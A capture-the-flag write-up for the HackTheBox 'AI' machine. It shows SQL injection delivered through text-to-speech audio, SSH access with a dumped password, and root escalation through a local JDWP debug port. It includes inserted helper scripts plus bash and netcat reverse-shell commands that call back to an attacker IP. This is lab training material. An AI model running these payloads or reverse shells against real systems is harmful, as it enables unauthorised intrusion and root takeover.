hackthebox AI

recon

nmap

nmap -sV -sT -sC -oN nmapinitial ai.htb

masscan

masscan -p1-65535 10.10.10.163 --rate=1000 -e eth0

nmap was far too slow, so masscan was used instead; it found ports 22 and 80 open.

Enumerate web paths with gobuster

gobuster dir -u http://ai.htb/ -w /usr/share/wordlists/dirb/common.txt -x php

This turns up http://ai.htb/intelligence.php.

The screenshot shows that ai.php is the page with the file upload form.

intelligence.php gives some instructions on how to use the site's speech recognition.

exploit

ffmpeg

Generate an audio file with ttsmp3.com and convert it into a test file:

ffmpeg -i ttsMP3.com_VoiceText_2020-2-3_11_23_15.mp3 ttsMP3.com_VoiceText_2020-2-3_11_23_15.wav

After uploading, the site displays the text it recognised from the test file.

This approach is a bit cumbersome; generating the wav locally is simpler:

apt install apt-file
apt-file update
apt-file search text2wave
apt-get install festival // festival is the package that provides text2wave, so this one step is enough

Then generate the wav file:

echo "test" | text2wave -o test.wav

sql

Try a single-quote injection (the spoken text here was "it's a test", so the apostrophe is the injected quote):

ffmpeg -i ttsMP3.com_VoiceText_2020-2-3_12_25_27.mp3 ttsMP3.com_VoiceText_2020-2-3_12_25_27.wav

Response:

Our understanding of your input is : it's a test
Query result : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 's a test'' at line 1

The point of the box is to build a SQL injection out of the text that the speech recogniser produces: every special character has to be spoken as a phrase the recogniser maps back to that character.

I honestly could not work this part out, so the following is copied straight from a writeup.

payload: retrieve the database name

one open single quote union select database open parenthesis close parenthesis comment database
echo "one open single quote union select database open parenthesis close parenthesis comment database" | text2wave -o test.wav

Response:

Our understanding of your input is : 1'union select database()-- -
Query result : alexa

The database is named alexa; the next step is to enumerate table names.

payload

one open single quote union select test from test comment database
echo "one open single quote union select test from test comment database" | text2wave -o test.wav

Response:

Our understanding of your input is : 1'union select test from test -- -
Query result : Table 'alexa.test' doesn't exist

payload

one open single quote union select test from users comment database

Response:

Our understanding of your input is : 1'union select test from users -- -
Query result : Unknown column 'test' in 'field list'

The users table exists: the error now complains about the column, not the table.

payload

one open single quote union select username from users comment database

Response: no luck, because the recogniser split "username" into "user name", so the query asked for a column called user:

Our understanding of your input is : 1'union select user name from users -- -
Query result : Unknown column 'user' in 'field list'

payload

one open single quote union select password from users comment database

This dumps the password column:

Our understanding of your input is : 1'union select password from users -- -
Query result : H,Sq9t6}a<)?q93_
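The payloads above all follow one pattern: every SQL character that the recogniser cannot hear has to be spoken as a phrase it maps back to that character, and the "Our understanding of your input is" line tells you whether the mapping survived. The helper below is an added example, not part of the original write-up or of the HTB box: it turns a SQL payload into that spoken form, emits the matching text2wave command, and checks the app's echo against the payload you intended. Its phrase table is reconstructed only from the request/echo pairs shown on this page; it refuses any other character rather than guessing a phrase, and the digit words above "one" are an untested assumption. The function names (to_speech, text2wave_command, parse_echo, echo_matches) are mine.

```python
import re
import shlex

# Spoken phrase for each SQL token, reconstructed from the payload/echo pairs
# shown above. Longest literal first so "-- -" is matched before any "-".
PHRASES = [
    ("-- -", "comment database"),
    ("'", "open single quote"),
    ("(", "open parenthesis"),
    (")", "close parenthesis"),
]
# Only "one" -> "1" is confirmed by the page; the rest is an assumption, and
# multi-digit numbers are spoken digit by digit.
DIGITS = dict(zip("0123456789",
                  "zero one two three four five six seven eight nine".split()))
WORD = re.compile(r"[A-Za-z]+")


def to_speech(payload: str) -> str:
    """Return the phrase to feed to text2wave so the recogniser yields `payload`.

    Keywords and plain identifiers are spoken as they are; whitespace is dropped
    because the recogniser inserts its own word boundaries. A character with no
    known phrase (',', '=', '_', ...) raises ValueError instead of guessing.
    """
    words = []
    i = 0
    while i < len(payload):
        for literal, phrase in PHRASES:
            if payload.startswith(literal, i):
                words.append(phrase)
                i += len(literal)
                break
        else:
            ch = payload[i]
            if ch.isdigit():
                words.append(DIGITS[ch])
                i += 1
            elif ch.isspace():
                i += 1
            else:
                m = WORD.match(payload, i)
                if m is None:
                    raise ValueError(f"no known spoken form for {ch!r} at offset {i}")
                words.append(m.group(0).lower())
                i = m.end()
    return " ".join(words)


def text2wave_command(payload: str, out: str = "test.wav") -> str:
    """Shell command that renders the phrase with festival's text2wave."""
    return f"echo {shlex.quote(to_speech(payload))} | text2wave -o {shlex.quote(out)}"


ECHO = re.compile(r"Our understanding of your input is\s*:\s*(.*)")
RESULT = re.compile(r"Query result\s*:\s*(.*)")


def parse_echo(response: str) -> tuple:
    """Pull (understood_text, query_result) out of the page's two-line reply."""
    echo = ECHO.search(response)
    if echo is None:
        raise ValueError("response does not contain the 'Our understanding' line")
    result = RESULT.search(response)
    return echo.group(1).strip(), (result.group(1).strip() if result else "")


def echo_matches(payload: str, response: str) -> bool:
    """True when the recogniser reproduced the payload character for character.

    The "username" -> "user name" case above is why this check matters: the
    query silently changes and the SQL error then points at the wrong column.
    """
    understood, _ = parse_echo(response)
    return understood == payload


if __name__ == "__main__":
    print(text2wave_command("1'union select database()-- -"))
```

Run it on the attacking box to print the text2wave command for a payload, upload the resulting wav, then paste the site's two response lines into echo_matches before trusting the Query result line.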

SSH as alexa

ssh alexa@ai.htb
password:H,Sq9t6}a<)?q93_

Login successful:

alexa@AI:~$ ls
user.txt
alexa@AI:~$ cat user.txt
c43b62c682a8c*******d4a2cda55e4b

Elevation

Check the running processes:

alexa@AI:~$ ps aux | grep java
root 38409 17.6 5.6 3137572 113460 ? Sl 08:56 0:03 /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp org.apache.catalina.startup.Bootstrap start

Check the listening ports: 8000, 8080, 8005 and 8009 are all bound to localhost only:

alexa@AI:~$ netstat -ntlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 127.0.0.1:8080 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN -
tcp6 0 0 127.0.0.1:8009 :::* LISTEN -

Looking at the Tomcat process again, note this argument passed to the java binary, which starts the JVM with a JDWP debug agent listening on port 8000 (as root, since Tomcat runs as root here):

-agentlib:jdwp=transport=dt_socket,address=localhost:8000
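Before pointing an exploit at that port it is worth confirming what actually answers on it. The probe below is an added example, not from the write-up and not part of jdwp-shellifier: it performs the 14-byte "JDWP-Handshake" exchange and then sends VirtualMachine.Version (command set 1, command 1), whose reply carries the JDWP version and the VM name; a defender can use the same probe to check whether a debug agent is exposed. The packet layout follows the JDWP specification (command header: length, id, flags, command set, command; reply header: length, id, flags, error code; strings are a 4-byte length plus UTF-8). build_version_reply exists only so the decoder can be exercised offline on a constructed reply; the strings used in that reply are made up, and the function names are mine.

```python
import socket
import struct
import sys

HANDSHAKE = b"JDWP-Handshake"
REPLY_FLAG = 0x80        # set in the flags byte of every reply packet
VM_COMMAND_SET = 1       # VirtualMachine command set
VM_VERSION = 1           # VirtualMachine.Version command


def build_command(packet_id: int, command_set: int, command: int, data: bytes = b"") -> bytes:
    """Encode a command packet: length(4) id(4) flags(1) set(1) cmd(1) data, big-endian."""
    return struct.pack(">IIBBB", 11 + len(data), packet_id, 0, command_set, command) + data


def _jdwp_string(text: str) -> bytes:
    raw = text.encode("utf-8")
    return struct.pack(">I", len(raw)) + raw


def _read_string(buf: bytes, offset: int):
    (n,) = struct.unpack_from(">I", buf, offset)
    offset += 4
    return buf[offset:offset + n].decode("utf-8"), offset + n


def build_version_reply(packet_id, description, major, minor, vm_version, vm_name) -> bytes:
    """Encode a VirtualMachine.Version reply; used here only for offline testing."""
    data = (_jdwp_string(description) + struct.pack(">ii", major, minor)
            + _jdwp_string(vm_version) + _jdwp_string(vm_name))
    return struct.pack(">IIBH", 11 + len(data), packet_id, REPLY_FLAG, 0) + data


def parse_version_reply(packet: bytes, expected_id: int) -> dict:
    """Decode a reply: length(4) id(4) flags(1) error(2), then the Version fields."""
    length, packet_id, flags, error = struct.unpack_from(">IIBH", packet, 0)
    if length != len(packet):
        raise ValueError(f"length field says {length}, got {len(packet)} bytes")
    if packet_id != expected_id or not flags & REPLY_FLAG:
        raise ValueError("packet is not the reply to our command")
    if error:
        raise ValueError(f"JDWP error code {error}")
    offset = 11
    description, offset = _read_string(packet, offset)
    major, minor = struct.unpack_from(">ii", packet, offset)
    offset += 8
    vm_version, offset = _read_string(packet, offset)
    vm_name, _ = _read_string(packet, offset)
    return {"description": description, "jdwp_major": major, "jdwp_minor": minor,
            "vm_version": vm_version, "vm_name": vm_name}


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def probe(host: str, port: int, timeout: float = 5.0) -> dict:
    """Handshake with a JDWP agent and return its Version reply as a dict."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(HANDSHAKE)
        if _recv_exact(sock, len(HANDSHAKE)) != HANDSHAKE:
            raise ConnectionError("peer did not answer the JDWP handshake")
        sock.sendall(build_command(1, VM_COMMAND_SET, VM_VERSION))
        header = _recv_exact(sock, 4)
        (length,) = struct.unpack(">I", header)
        return parse_version_reply(header + _recv_exact(sock, length - 4), 1)


if __name__ == "__main__":
    host, port = (sys.argv[1], int(sys.argv[2])) if len(sys.argv) == 3 else ("127.0.0.1", 8000)
    print(probe(host, port))
```

Because the agent is bound to loopback, run the probe on the target itself (python3 jdwp_probe.py 127.0.0.1 8000) or through an SSH port forward; a JDWP agent answers the handshake with the same 14 bytes and then returns its version, whereas anything else on the port will fail at the handshake check.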

I searched for an exploit for this jdwp service and found the one below. I uploaded the python script to the box as alexa, put a reverse-shell payload into a file named pwned.sh, pointed the exploit at that file, and then ran it:

~/Desktop/Hackthebox/AI/pwn/jdwp-shellifier(master) # searchsploit jdwp
------------------------------------------------- ------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------- ------------------------------------
Java Debug Wire Protocol (JDWP) - Remote Code Ex | exploits/java/remote/46501.py

Upload pwned.sh and jdwp-shellifier (the exploit executes the path it is given, so pwned.sh needs the execute bit, e.g. chmod +x /home/alexa/pwned.sh):

scp -r pwned.sh alexa@ai.htb:/home/alexa // enter alexa's password and the file lands in that directory
alexa@AI:~/pwn/jdwp-shellifier$ cat /home/alexa/pwned.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.23/1337 0>&1
// I originally used rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.23 1337 >/tmp/f, but that command never gave me a shell back

Run the exploit against the loopback JDWP port (the tool defaults to port 8000):

python jdwp-shellifier.py -t 127.0.0.1 --cmd /home/alexa/pwned.sh

jdwp-shellifier plants its payload behind a breakpoint (by default on java.net.ServerSocket.accept), so nothing runs until the JVM next accepts a connection. With a listener waiting on 10.10.14.23:1337 for the reverse shell, open a second SSH session from Kali and poke Tomcat's loopback-only shutdown port to trip the breakpoint:

nc localhost 8005

Success: the reverse shell comes back as root.

My home broadband is awful; scans and tests frequently timed out.

Reference:

Hacking the Java Debug Wire Protocol – or – “How I met your Java debugger”
